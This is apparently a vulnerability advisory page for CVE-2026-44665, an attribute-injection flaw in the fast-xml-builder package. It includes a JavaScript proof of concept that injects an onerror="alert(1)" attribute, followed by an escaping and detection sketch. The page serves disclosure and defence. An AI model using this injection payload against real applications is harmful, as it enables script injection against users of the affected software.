Security Vulnerability Report
CVE-2026-44665 CVSS 6.1 MEDIUM

CVE-2026-44665

Published: 2026-05-13 16:16:59
Last Modified: 2026-05-13 16:53:33

Description

fast-xml-builder builds XML from JSON. Prior to 1.1.7, when input data has quotes in attribute values and entity processing is not enabled, the attribute value is broken into multiple attributes. This gives an attacker room to insert unwanted attributes into the XML/HTML. This vulnerability is fixed in 1.1.7.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

fast-xml-builder < 1.1.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
const { XMLBuilder } = require('fast-xml-builder');

// Vulnerable configuration scenario
const options = {
  processEntities: false, // The vulnerability context
  ignoreAttributes: false,
  format: true
};

const builder = new XMLBuilder(options);

// Malicious input containing quotes to break attribute value
const maliciousInput = {
  "user": {
    "@_name": "admin",
    "@_role": "user\" onerror=\"alert(1)\" x=\"" // Injection payload
  }
};

try {
  const xmlOutput = builder.build(maliciousInput);
  console.log("Generated XML:");
  console.log(xmlOutput);
  // Output in vulnerable versions will look like:
  // <user name="admin" role="user" onerror="alert(1)" x="" />
} catch (e) {
  console.error(e);
}
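Mitigation sketch for callers that cannot upgrade to 1.1.7 immediately and run with entity processing disabled. This is an added example, not code from the fast-xml-builder project or the advisory. It assumes attributes use the "@_" key prefix seen in the PoC input and that attribute values are plain text; the function names are hypothetical.

```javascript
// Added example: audit and pre-escape attribute values before they reach an
// XML builder that does not escape them itself.
// Assumption: attribute keys start with "@_", as in the PoC input above.
const ATTR_PREFIX = '@_';
const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&apos;' };

// Escape the characters that can terminate or restructure an attribute value.
function escapeAttrValue(value) {
  return value.replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// Detection: return the paths of attribute values that contain a quote.
function findQuotedAttributes(node, path = '') {
  if (node === null || typeof node !== 'object') return [];
  const hits = [];
  for (const [key, value] of Object.entries(node)) {
    const here = path ? `${path}.${key}` : key;
    if (key.startsWith(ATTR_PREFIX) && typeof value === 'string') {
      if (/["']/.test(value)) hits.push(here);
    } else {
      hits.push(...findQuotedAttributes(value, here));
    }
  }
  return hits;
}

// Mitigation: return a deep copy with every string attribute value escaped.
// Element text and non-string values are left untouched.
function hardenAttributes(node) {
  if (Array.isArray(node)) return node.map(hardenAttributes);
  if (node === null || typeof node !== 'object') return node;
  const out = {};
  for (const [key, value] of Object.entries(node)) {
    out[key] = key.startsWith(ATTR_PREFIX) && typeof value === 'string'
      ? escapeAttrValue(value)
      : hardenAttributes(value);
  }
  return out;
}

// Constructed sample with the same shape as the PoC input.
const sample = { user: { '@_name': 'admin', '@_role': 'user" onerror="alert(1)" x="' } };
console.log(findQuotedAttributes(sample));
console.log(hardenAttributes(sample).user['@_role']);
```

Pass the hardened copy to the builder instead of the raw input, and log the paths returned by findQuotedAttributes to spot injection attempts. Do not combine this with a configuration that already escapes attribute values, or the entities will be escaped twice.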

References

https://github.com/NaturalIntelligence/fast-xml-builder/security/advisories/GHSA-5wm8-gmm8-39j9

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44665", "sourceIdentifier": "[email protected]", "published": "2026-05-13T16:16:59.093", "lastModified": "2026-05-13T16:53:33.310", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "fast-xml-builder builds XML from JSON. Prior to 1.1.7, when an input data has quotes in attribute values but process entities is not enabled, it breaks the attribute value into multiple attributes. This gives the room for an attacker to insert unwanted attributes to the XML/HTML. This vulnerability is fixed in 1.1.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-91"}]}], "references": [{"url": "https://github.com/NaturalIntelligence/fast-xml-builder/security/advisories/GHSA-5wm8-gmm8-39j9", "source": "[email protected]"}]}}